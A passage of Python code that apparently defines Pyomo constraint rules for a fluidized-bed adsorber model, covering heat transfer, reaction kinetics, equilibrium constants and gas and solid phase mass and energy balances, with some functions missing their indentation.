                       (m.dp / m.dx) ** 0.225)
        else:
            return Constraint.Skip
# fb
    def a49_rule(m, it, jt, ix, jx):
        """Bubble contact fraction at tube surface: fb = 0.33 * (vmf^2*(fn-ah)^2/(dp*gc))^0.14."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.fb[it, jt, ix, jx] == 0.33 * (
                ((m.vmf[it, jt] ** 2) * ((m.fn[it, jt, ix, jx] - m.ah) ** 2) / (m.dp * m.gc)) ** 0.14)
        else:
            return Constraint.Skip
# hd
    def a50_rule(m, it, jt, ix, jx):
        """Dense-phase wall heat transfer: hd = 2*sqrt((kpa/1000)*rhos*cps*(1-ed)/(pi*tau))."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.hd[it, jt, ix, jx] == \
                   2 * sqrt((m.kpa[it, jt, ix, jx] / 1000) * m.rhos * m.cps * (1 - m.ed[it, jt, ix, jx]) / (
                       m.pi * m.tau[it, jt, ix, jx]))
        else:
            return Constraint.Skip
# hl
    def a51_rule(m, it, jt, ix, jx):
        """Lean-phase wall heat transfer (implicit Nusselt form): 1000*hl*dp/kg = 0.009 * Ar^0.5 * Pr^0.33."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return 1000 * m.hl[it, jt, ix, jx] * m.dp / m.kg == 0.009 * (m.Ar[it, jt, ix, jx] ** 0.5) * (m.Pr ** 0.33)
        else:
            return Constraint.Skip
# ht
    def a52_rule(m, it, jt, ix, jx):
        """Total wall heat transfer: ht = fb*hd + (1 - fb)*hl."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.ht[it, jt, ix, jx] == m.fb[it, jt, ix, jx] * m.hd[it, jt, ix, jx] + (1 - m.fb[it, jt, ix, jx]) * \
                                                                                        m.hl[it, jt, ix, jx]
        else:
            return Constraint.Skip
# dThx
def a54_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dThx[it, jt, ix, jx] == m.Ttube[it, jt, ix, jx] - m.Tse[it, jt, ix, jx]
else:
return Constraint.Skip
# Ttube
    def a55_rule(m, it, jt, ix, jx):
        """Tube-wall energy balance: ht*dThx*Cr = hw*(Thx - Ttube)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.ht[it, jt, ix, jx] * m.dThx[it, jt, ix, jx] * m.Cr == \
                   m.hw * (m.Thx[it, jt, ix, jx] - m.Ttube[it, jt, ix, jx])
        else:
            return Constraint.Skip
# hxh
    def a56_rule(m, it, jt, ix, jx):
        """HX fluid temperature from enthalpy (linear fit): Thx = 33.2104 + 14170.15*(hxh + 0.285) + 273.15."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Thx[it, jt, ix, jx] == 33.2104 + 14170.15 * (m.hxh[it, jt, ix, jx] + 0.285) + 273.15
        else:
            return Constraint.Skip
# vmf
    def a57_rule(m, it, jt):
        """Minimum-fluidization velocity (implicit Ergun-type equation, scaled by 10), using inlet-point
        (ix=1, jx=1) gas density; time-indexed only."""
        if 0 < jt <= m.ncp_t:
            return 10 * 1.75 / (m.phis * m.emf ** 3) * (m.dp * m.vmf[it, jt] * m.rhog[it, jt, 1, 1] / m.mug) ** 2 + \
                   10 * 150 * (1 - m.emf) / ((m.phis ** 2) * (m.emf ** 3)) * (
                       m.dp * m.vmf[it, jt] * m.rhog[it, jt, 1, 1] / m.mug) \
                   == \
                   10 * m.dp ** 3 * m.rhog[it, jt, 1, 1] * (m.rhos - m.rhog[it, jt, 1, 1]) * m.gc / m.mug ** 2
        else:
            return Constraint.Skip
# k1c
    def a58_rule(m, it, jt, ix, jx):
        """Arrhenius rate constant (cloud-wake, rxn 1): k1c = A1 * Tsc * exp(-E1/(R*Tsc))."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.k1c[it, jt, ix, jx] == \
                   m.A1 * (m.Tsc[it, jt, ix, jx]) * exp(-m.E1 / (m.R * (m.Tsc[it, jt, ix, jx])))
        else:
            return Constraint.Skip
# k2c
    def a59_rule(m, it, jt, ix, jx):
        """Arrhenius rate constant (cloud-wake, rxn 2): k2c = A2 * Tsc * exp(-E2/(R*Tsc))."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.k2c[it, jt, ix, jx] == \
                   m.A2 * (m.Tsc[it, jt, ix, jx]) * exp(-m.E2 / (m.R * (m.Tsc[it, jt, ix, jx])))
        else:
            return Constraint.Skip
# k3c
    def a60_rule(m, it, jt, ix, jx):
        """Arrhenius rate constant (cloud-wake, rxn 3): k3c = A3 * Tsc * exp(-E3/(R*Tsc))."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.k3c[it, jt, ix, jx] == m.A3 * (m.Tsc[it, jt, ix, jx]) * exp(-m.E3 / (m.R * (m.Tsc[it, jt, ix, jx])))
        else:
            return Constraint.Skip
# k1e
    def a61_rule(m, it, jt, ix, jx):
        """Arrhenius rate constant (emulsion, rxn 1): k1e = A1 * Tse * exp(-E1/(R*Tse))."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.k1e[it, jt, ix, jx] == m.A1 * (m.Tse[it, jt, ix, jx]) * exp(-m.E1 / (m.R * (m.Tse[it, jt, ix, jx])))
        else:
            return Constraint.Skip
# k2e
    def a62_rule(m, it, jt, ix, jx):
        """Arrhenius rate constant (emulsion, rxn 2): k2e = A2 * Tse * exp(-E2/(R*Tse))."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.k2e[it, jt, ix, jx] == m.A2 * (m.Tse[it, jt, ix, jx]) * exp(-m.E2 / (m.R * (m.Tse[it, jt, ix, jx])))
        else:
            return Constraint.Skip
# k3e
    def a63_rule(m, it, jt, ix, jx):
        """Arrhenius rate constant (emulsion, rxn 3): k3e = A3 * Tse * exp(-E3/(R*Tse))."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.k3e[it, jt, ix, jx] == m.A3 * (m.Tse[it, jt, ix, jx]) * exp(-m.E3 / (m.R * (m.Tse[it, jt, ix, jx])))
        else:
            return Constraint.Skip
# Ke1c
    def a64_rule(m, it, jt, ix, jx):
        """Equilibrium constant (cloud-wake, rxn 1), van 't Hoff form: Ke1c * P * 1e5 = exp(-dH1/(R*Tsc) + dS1/R)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Ke1c[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(-m.dH1 / (m.R * (m.Tsc[it, jt, ix, jx])) + m.dS1 / m.R)
        else:
            return Constraint.Skip
# Ke2c
    def a65_rule(m, it, jt, ix, jx):
        """Equilibrium constant (cloud-wake, rxn 2): Ke2c * P * 1e5 = exp(-dH2/(R*Tsc) + dS2/R)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Ke2c[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(-m.dH2 / (m.R * (m.Tsc[it, jt, ix, jx])) + m.dS2 / m.R)
        else:
            return Constraint.Skip
# Ke3c
    def a66_rule(m, it, jt, ix, jx):
        """Equilibrium constant (cloud-wake, rxn 3): Ke3c * P * 1e5 = exp(-dH3/(R*Tsc) + dS3/R)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Ke3c[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(-m.dH3 / (m.R * (m.Tsc[it, jt, ix, jx])) + m.dS3 / m.R)
        else:
            return Constraint.Skip
# Ke1e
    def a67_rule(m, it, jt, ix, jx):
        """Equilibrium constant (emulsion, rxn 1): Ke1e * P * 1e5 = exp(-dH1/(R*Tse) + dS1/R)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Ke1e[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(-m.dH1 / (m.R * m.Tse[it, jt, ix, jx]) + m.dS1 / m.R)
        else:
            return Constraint.Skip
# Ke2e
    def a68_rule(m, it, jt, ix, jx):
        """Equilibrium constant (emulsion, rxn 2): Ke2e * P * 1e5 = exp(-dH2/(R*Tse) + dS2/R)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Ke2e[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(
                -m.dH2 / (m.R * (m.Tse[it, jt, ix, jx])) + m.dS2 / m.R)
        else:
            return Constraint.Skip
# Ke3e
    def a69_rule(m, it, jt, ix, jx):
        """Equilibrium constant (emulsion, rxn 3): Ke3e * P * 1e5 = exp(-dH3/(R*Tse) + dS3/R)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Ke3e[it, jt, ix, jx] * m.P[it, jt, ix, jx] * 1E5 == exp(
                -m.dH3 / (m.R * (m.Tse[it, jt, ix, jx])) + m.dS3 / m.R)
        else:
            return Constraint.Skip
# r1c
    def a70_rule(m, it, jt, ix, jx):
        """Cloud-wake reaction rate 1 (reversible adsorption of 'h'): r1c = k1c*(P*yc_h*1e5 - nc_h*rhos/Ke1c)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.r1c[it, jt, ix, jx] == \
                   m.k1c[it, jt, ix, jx] * ((m.P[it, jt, ix, jx] * m.yc[it, jt, ix, jx, 'h'] * 1E5) - (m.nc[it, jt, ix, jx, 'h'] * m.rhos / m.Ke1c[it, jt, ix, jx]))
        else:
            return Constraint.Skip
# r2c
    def a71_rule(m, it, jt, ix, jx):
        """Cloud-wake reaction rate 2: forward term uses available-site fraction
        (1 - 2*theta_n - theta_c) where theta_i = nc_i*rhos/nv; reverse term divided by Ke2c."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.r2c[it, jt, ix, jx] == m.k2c[it, jt, ix, jx] * (
                (1 - 2 * (m.nc[it, jt, ix, jx, 'n'] * m.rhos / m.nv) -
                 (m.nc[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) * m.nc[it, jt, ix, jx, 'h'] * m.rhos * m.P[
                    it, jt, ix, jx] * m.yc[it, jt, ix, jx, 'c'] * 1E5 -
                (((m.nc[it, jt, ix, jx, 'n'] * m.rhos / m.nv) + (m.nc[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) *
                 m.nc[it, jt, ix, jx, 'c'] * m.rhos / m.Ke2c[it, jt, ix, jx]))
        else:
            return Constraint.Skip
# r3c
    def a72_rule(m, it, jt, ix, jx):
        """Cloud-wake reaction rate 3: forward term is (site fraction)^2 * (P*yc_c*1e5)^m1;
        reverse term divided by Ke3c."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.r3c[it, jt, ix, jx] == m.k3c[it, jt, ix, jx] * (
                ((1 - 2 * (m.nc[it, jt, ix, jx, 'n'] * m.rhos / m.nv) -
                  (m.nc[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) ** 2) * (
                    (m.P[it, jt, ix, jx] * m.yc[it, jt, ix, jx, 'c'] * 1E5) ** m.m1) -
                ((m.nc[it, jt, ix, jx, 'n'] * m.rhos / m.nv) * (
                    (m.nc[it, jt, ix, jx, 'n'] * m.rhos / m.nv) + (
                        m.nc[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) /
                 m.Ke3c[it, jt, ix, jx]))
        else:
            return Constraint.Skip
# r1e
    def a73_rule(m, it, jt, ix, jx):
        """Emulsion reaction rate 1 (mirror of a70 with emulsion variables): r1e = k1e*(P*ye_h*1e5 - ne_h*rhos/Ke1e)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.r1e[it, jt, ix, jx] == m.k1e[it, jt, ix, jx] * ((m.P[it, jt, ix, jx] * m.ye[it, jt, ix, jx, 'h'] * 1E5) - (m.ne[it, jt, ix, jx, 'h'] * m.rhos / m.Ke1e[it, jt, ix, jx]))
        else:
            return Constraint.Skip
# r2e
    def a74_rule(m, it, jt, ix, jx):
        """Emulsion reaction rate 2 (mirror of a71 with emulsion variables ne/ye/Ke2e)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.r2e[it, jt, ix, jx] == m.k2e[it, jt, ix, jx] * (
                (1. - 2. * (m.ne[it, jt, ix, jx, 'n'] * m.rhos / m.nv) -
                 (m.ne[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) * m.ne[it, jt, ix, jx, 'h'] * m.rhos * (
                    m.P[it, jt, ix, jx] * m.ye[it, jt, ix, jx, 'c'] * 1E5) -
                (((m.ne[it, jt, ix, jx, 'n'] * m.rhos / m.nv) +
                  (m.ne[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) * m.ne[it, jt, ix, jx, 'c'] * m.rhos / m.Ke2e[
                     it, jt, ix, jx])
            )
        else:
            return Constraint.Skip
# r3e
    def a75_rule(m, it, jt, ix, jx):
        """Emulsion reaction rate 3 (mirror of a72 with emulsion variables ne/ye/Ke3e)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.r3e[it, jt, ix, jx] == \
                   m.k3e[it, jt, ix, jx] * (
                       ((1. - 2. * (m.ne[it, jt, ix, jx, 'n'] * m.rhos / m.nv) -
                         (m.ne[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) ** 2) * (
                           (m.P[it, jt, ix, jx] * m.ye[it, jt, ix, jx, 'c'] * 1E5) ** m.m1) -
                       ((m.ne[it, jt, ix, jx, 'n'] * m.rhos / m.nv) * (
                           (m.ne[it, jt, ix, jx, 'n'] * m.rhos / m.nv) + (m.ne[it, jt, ix, jx, 'c'] * m.rhos / m.nv)) /
                        m.Ke3e[it, jt, ix, jx]))
        else:
            return Constraint.Skip
# rgc 'c'
    def a76_rule(m, it, jt, ix, jx):
        """Cloud-wake gas generation of 'c': rgc['c'] = (nv*r3c + r2c)/1000 (unit conversion by 1000)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rgc[it, jt, ix, jx, 'c'] == (m.nv * m.r3c[it, jt, ix, jx] + m.r2c[it, jt, ix, jx]) / 1000.
        else:
            return Constraint.Skip
# rge 'c'
    def a77_rule(m, it, jt, ix, jx):
        """Emulsion gas generation of 'c': rge['c'] = (nv*r3e + r2e)/1000."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rge[it, jt, ix, jx, 'c'] == (m.nv * m.r3e[it, jt, ix, jx] + m.r2e[it, jt, ix, jx]) / 1000.
        else:
            return Constraint.Skip
# rsc 'c'
    def a78_rule(m, it, jt, ix, jx):
        """Cloud-wake solids generation of 'c': rsc['c'] = r2c."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rsc[it, jt, ix, jx, 'c'] == m.r2c[it, jt, ix, jx]
        else:
            return Constraint.Skip
# rse 'c'
    def a79_rule(m, it, jt, ix, jx):
        """Emulsion solids generation of 'c': rse['c'] = r2e."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rse[it, jt, ix, jx, 'c'] == m.r2e[it, jt, ix, jx]
        else:
            return Constraint.Skip
# rgc 'h'
    def a80_rule(m, it, jt, ix, jx):
        """Cloud-wake gas generation of 'h': rgc['h'] = r1c/1000."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rgc[it, jt, ix, jx, 'h'] == m.r1c[it, jt, ix, jx] / 1000
        else:
            return Constraint.Skip
# rge 'h'
    def a81_rule(m, it, jt, ix, jx):
        """Emulsion gas generation of 'h': rge['h'] = r1e/1000."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rge[it, jt, ix, jx, 'h'] == m.r1e[it, jt, ix, jx] / 1000
        else:
            return Constraint.Skip
# rsc 'h'
    def a82_rule(m, it, jt, ix, jx):
        """Cloud-wake solids generation of 'h': rsc['h'] = r1c - r2c."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rsc[it, jt, ix, jx, 'h'] == m.r1c[it, jt, ix, jx] - m.r2c[it, jt, ix, jx]
        else:
            return Constraint.Skip
# rse 'h'
    def a83_rule(m, it, jt, ix, jx):
        """Emulsion solids generation of 'h': rse['h'] = r1e - r2e."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rse[it, jt, ix, jx, 'h'] == m.r1e[it, jt, ix, jx] - m.r2e[it, jt, ix, jx]
        else:
            return Constraint.Skip
# rgc 'n'
def a84_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.rgc[it, jt, ix, jx, 'n'] == 0
else:
return Constraint.Skip
# rge 'n'
    def a85_rule(m, it, jt, ix, jx):
        """No gas-phase generation of 'n' in the emulsion: rge['n'] = 0."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rge[it, jt, ix, jx, 'n'] == 0
        else:
            return Constraint.Skip
# rsc 'n'
    def a86_rule(m, it, jt, ix, jx):
        """Cloud-wake solids generation of 'n': rsc['n'] = nv * r3c."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rsc[it, jt, ix, jx, 'n'] == m.nv * m.r3c[it, jt, ix, jx]
        else:
            return Constraint.Skip
# rse 'n'
    def a87_rule(m, it, jt, ix, jx):
        """Emulsion solids generation of 'n': rse['n'] = nv * r3e."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rse[it, jt, ix, jx, 'n'] == m.nv * m.r3e[it, jt, ix, jx]
        else:
            return Constraint.Skip
# hsc
    def a88_rule(m, it, jt, ix, jx):
        """Cloud-wake solids specific enthalpy hsc: adsorbed-species terms (cp*(Tsc-273.16) + dH) scaled by 1e-3
        plus the bare-solid term cps*(Tsc-273.16).
        NOTE(review): the 'n'-species term reuses m.cpgcsc['c'] — possibly intended as m.cpgcsc['n'];
        confirm against the enthalpy model before changing."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.hsc[it, jt, ix, jx] == ((m.nc[it, jt, ix, jx, 'h'] + m.nc[it, jt, ix, jx, 'c']) * (m.cpgcsc['h'] * (m.Tsc[it, jt, ix, jx] - 273.16) + m.dH1) +
                                            m.nc[it, jt, ix, jx, 'c'] * (m.cpgcsc['c'] * (m.Tsc[it, jt, ix, jx] - 273.16) + m.dH2) +
                                            m.nc[it, jt, ix, jx, 'n'] * (m.cpgcsc['c'] * (m.Tsc[it, jt, ix, jx] - 273.16) + m.dH3)) * 1E-3 + m.cps * (m.Tsc[it, jt, ix, jx] - 273.16)
        else:
            return Constraint.Skip
# hse
    def a89_rule(m, it, jt, ix, jx):
        """Emulsion solids specific enthalpy hse (mirror of a88 with Tse/ne/cpgcse).
        NOTE(review): as in a88, the 'n'-species term reuses m.cpgcse['c'] — possibly intended
        as m.cpgcse['n']; confirm before changing."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.hse[it, jt, ix, jx] == ((m.ne[it, jt, ix, jx, 'h'] + m.ne[it, jt, ix, jx, 'c']) * (m.cpgcse['h'] * (m.Tse[it, jt, ix, jx]-273.16) + m.dH1) +
                                            m.ne[it, jt, ix, jx, 'c'] * (m.cpgcse['c'] * (m.Tse[it, jt, ix, jx]-273.16) + m.dH2) +
                                            m.ne[it, jt, ix, jx, 'n'] * (m.cpgcse['c'] * (m.Tse[it, jt, ix, jx]-273.16) + m.dH3)) * 1E-3 + m.cps * (m.Tse[it, jt, ix, jx] - 273.16)
        else:
            return Constraint.Skip
# equation A.3 Gas phase component balance
# dNgc_dt
    def de_ngc_rule(m, it, jt, ix, jx, k):
        """Eq. A.3, cloud-wake gas species balance: accumulation = bubble->cloud transfer
        - cloud->emulsion transfer - reaction consumption, scaled by the time-element width hi_t.
        NOTE(review): unlike de_hgc_rule this balance carries no m.Ax factor — confirm the
        intended per-area units of Ngc before assuming an omission."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.dNgc_dt[it, jt, ix, jx, k] == \
                   (m.delta[it, jt, ix, jx] * m.Kbc[it, jt, ix, jx, k] * (m.cb[it, jt, ix, jx, k] - m.cc[it, jt, ix, jx, k]) - \
                    m.delta[it, jt, ix, jx] * m.Kce[it, jt, ix, jx, k] * (m.cc[it, jt, ix, jx, k] - m.ce[it, jt, ix, jx, k]) - \
                    m.delta[it, jt, ix, jx] * m.fcw[it, jt, ix, jx] * (1. - m.ed[it, jt, ix, jx]) * m.rgc[it, jt, ix, jx, k]) * \
                   m.hi_t[it]
        else:
            return Constraint.Skip
# equation A.4 Gas phase energy balance
# dHgc_dt
    def de_hgc_rule(m, it, jt, ix, jx):
        """Eq. A.4, cloud-wake gas energy balance: bubble->cloud heat transfer - cloud->emulsion heat
        transfer - gas-to-particle heat transfer - enthalpy carried by reacting gas, scaled by hi_t."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.dHgc_dt[it, jt, ix, jx] == \
                   (m.Ax * m.delta[it, jt, ix, jx] * \
                    m.Hbc[it, jt, ix, jx] * (m.Tgb[it, jt, ix, jx] - m.Tgc[it, jt, ix, jx]) - \
                    m.Ax * m.delta[it, jt, ix, jx] * \
                    m.Hce[it, jt, ix, jx] * (m.Tgc[it, jt, ix, jx] - m.Tge[it, jt, ix, jx]) - \
                    m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) * \
                    m.rhos * m.ap * m.hp[it, jt, ix, jx] * (m.Tgc[it, jt, ix, jx] - m.Tsc[it, jt, ix, jx]) - \
                    m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) * \
                    sum(m.rgc[it, jt, ix, jx, k] * m.cpgcgc[k] for k in m.sp) * m.Tgc[it, jt, ix, jx]) * m.hi_t[it]
        else:
            return Constraint.Skip
# equation A.5 Solid phase adsorbed species balance
    # dNsc_dt
    def de_nsc_rule(m, it, jt, ix, jx, k):
        """Eq. A.5, cloud-wake adsorbed-species balance: -convection (dccwin_dx) - bulk removal (Ksbulk)
        - cloud->emulsion solids exchange + reaction generation; both sides scaled by the spatial
        element width hi_x[ix], and the RHS by the time-element width hi_t[it]."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.dNsc_dt[it, jt, ix, jx, k] * m.hi_x[ix] == \
                   (-m.dccwin_dx[it, jt, ix, jx, k] * m.Ax - m.Ksbulk[it, jt, ix, jx, k] - \
                    m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
                        m.nc[it, jt, ix, jx, k] - m.ne[it, jt, ix, jx, k]) + \
                    m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) *
                    m.rsc[it, jt, ix, jx, k]) * m.hi_t[it]
        else:
            return Constraint.Skip
# put derivative space here
# equation A.6 Solid phase energy balance
# dHsc_dt
    def de_hsc_rule(m, it, jt, ix, jx):
        """Eq. A.6, cloud-wake solids energy balance: -enthalpy convection (decwin_dx) - bulk enthalpy
        removal - cloud->emulsion enthalpy exchange + enthalpy of transferred reacting gas
        + gas-to-particle heat transfer; scaled by hi_x (both sides) and hi_t (RHS)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.dHsc_dt[it, jt, ix, jx] * m.hi_x[ix] \
                   == (-m.decwin_dx[it, jt, ix, jx] * m.Ax - m.Hsbulk[it, jt, ix, jx] - \
                       m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (m.hsc[it, jt, ix, jx] - m.hse[it, jt, ix, jx]) + \
                       m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (
                           1 - m.ed[it, jt, ix, jx]) * sum((m.rgc[it, jt, ix, jx, k] * m.cpgcgc[k]) for k in m.sp) * (m.Tgc[it, jt, ix, jx]) + \
                       m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (
                           1 - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
                           m.Tgc[it, jt, ix, jx] - m.Tsc[it, jt, ix, jx])) * m.hi_t[it]
        else:
            return Constraint.Skip
# equation A.7 Gas phase component balance
# dNge_dt
    def de_nge_rule(m, it, jt, ix, jx, k):
        """Eq. A.7, emulsion gas species balance: cloud->emulsion transfer - reaction consumption
        - bulk gas exchange (Kgbulk divided by the spatial element width), scaled by hi_t."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.dNge_dt[it, jt, ix, jx, k] \
                   == (m.Ax * m.delta[it, jt, ix, jx] * m.Kce[it, jt, ix, jx, k] * (
                m.cc[it, jt, ix, jx, k] - m.ce[it, jt, ix, jx, k]) - \
                       m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
                           1. - m.ed[it, jt, ix, jx]) * m.rge[
                           it, jt, ix, jx, k] - \
                       m.Kgbulk[it, jt, ix, jx, k] / m.hi_x[ix]) * m.hi_t[it]
        else:
            return Constraint.Skip
# equation A.8 Gas phase energy balance
# dHge_dt
    def de_hge_rule(m, it, jt, ix, jx):
        """Eq. A.8, emulsion gas energy balance: cloud->emulsion heat transfer - gas-to-particle
        heat transfer - bulk enthalpy exchange - enthalpy carried by reacting gas, scaled by hi_t."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.dHge_dt[it, jt, ix, jx] \
                   == (m.Ax * m.delta[it, jt, ix, jx] * m.Hce[it, jt, ix, jx] * (
                m.Tgc[it, jt, ix, jx] - m.Tge[it, jt, ix, jx]) - \
                       m.Ax * (1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
                           1. - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
                           m.Tge[it, jt, ix, jx] - m.Tse[it, jt, ix, jx]) - \
                       m.Hgbulk[it, jt, ix, jx] / m.hi_x[ix] - \
                       m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
                           1. - m.ed[it, jt, ix, jx]) * \
                       sum(m.rge[it, jt, ix, jx, k] * m.cpgcge[k] for k in m.sp) * m.Tge[it, jt, ix, jx]) * m.hi_t[it]
        else:
            return Constraint.Skip
# put derivative space here
# equation A.9 Solid phase adsorbed species balance
# dNse_dt
def de_nse_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNse_dt[it, jt, ix, jx, k] * m.hi_x[ix] == \
(m.dcein_dx[it, jt, ix, jx, k] * m.Ax + m.Ksbulk[it, jt, ix, jx, k] + \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.nc[it, jt, ix, jx, k] - m.ne[it, jt, ix, jx, k]) + \
m.hi_x[ix] * m.Ax * (
1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1 - m.ed[it, jt, ix, jx]) * m.rse[it, jt, ix, jx, k]) * m.hi_t[it]
else:
return Constraint.Skip
# put derivative space here
# equation A.10 Solid phase energy balance
# dHse_dt
def de_hse_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHse_dt[it, jt, ix, jx] * m.hi_x[ix] == \
(m.deein_dx[it, jt, ix, jx] * m.Ax + m.Hsbulk[it, jt, ix, jx] + \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.hsc[it, jt, ix, jx] - m.hse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.Ax * (
1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1 - m.ed[it, jt, ix, jx]) * \
sum((m.rge[it, jt, ix, jx, k] * m.cpgcge[k]) for k in m.sp) * m.Tge[it, jt, ix, jx] + \
m.hi_x[ix] * m.Ax * (
1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
m.Tge[it, jt, ix, jx] - m.Tse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.pi * m.dx * m.ht[it, jt, ix, jx] * m.dThx[it, jt, ix, jx] * m.Nx * m.Cr) * m.hi_t[it]
else:
return Constraint.Skip
# shift the AV?
# dz_dx
def dex_z_rule(m, it, jt, ix, jx):
    """Hold the spatial derivative of z at zero (z is flat within x)."""
    if not (0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x):
        return Constraint.Skip
    return m.dz_dx[it, jt, ix, jx] == 0
# Kgbulk
def i1_rule(m, it, jt, ix, jx, k):
    """Bulk gas interchange Kgbulk: driven by the total-concentration
    difference between emulsion and bubble phases, apportioned to
    species k via the bubble mole fraction yb."""
    if not (0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x):
        return Constraint.Skip
    ce_total = sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp)
    cb_total = sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)
